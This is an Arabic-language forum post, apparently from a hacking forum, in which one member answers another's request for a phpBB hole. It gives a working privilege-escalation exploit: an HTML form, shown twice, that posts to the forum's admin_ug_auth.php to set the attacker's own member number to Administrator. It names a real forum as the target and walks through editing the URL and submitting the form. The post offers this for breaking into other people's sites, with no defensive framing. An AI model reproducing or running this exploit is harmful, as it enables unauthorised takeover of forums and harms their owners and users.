عدد النقاط : 10
اقتباس المشاركة الأصلية كتبت بواسطة sh-jaf ما بقي إلا أشوف ثغرة في Powered by phpBB © 2001 ان شاء الله نشوف أجل في ثغرة اخي هاذا هو المنتدى http://www.cheela.org وهاذا هو استغلال الثغرة يجب اولا التسجيل في المنتدى<font color="Blue" size="6"> ثم احفظ الايد تبعك يعني رقم العضوية ثم افتح مفكرة جديدة واكتب فيها هاذا الكود كود PHP: <html> <head> </head> ******> <form method="post" action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"> User Level: <select name="userlevel"> <option value="admin">Administrator</option> <option value="user">User</option></select> <input type="hidden" name="private***91;1***93;" value="0"> <input type="hidden" name="moderator***91;1***93;" value="0"> <input type="hidden" name="mode" value="user"> <input type="hidden" name="adv" value=""> User Number: <input type="text" name="u" size="5"> <input type="submit" name="submit" value="Submit"> </form> </body> </html> ثم عدل على الكود بالموقع الذي تريد اختراقه ضع الموقع في مكان هاذا الرابط http://www.domain_name /board_directory ثم احفض المفكرة بصيغة html عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى أضغط زر submit بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
<html> <head> </head> ******> <form method="post" action="http://www.domain_name/board_directory/adm in/admin_ug_auth.php"> User Level: <select name="userlevel"> <option value="admin">Administrator</option> <option value="user">User</option></select> <input type="hidden" name="private***91;1***93;" value="0"> <input type="hidden" name="moderator***91;1***93;" value="0"> <input type="hidden" name="mode" value="user"> <input type="hidden" name="adv" value=""> User Number: <input type="text" name="u" size="5"> <input type="submit" name="submit" value="Submit"> </form> </body> </html>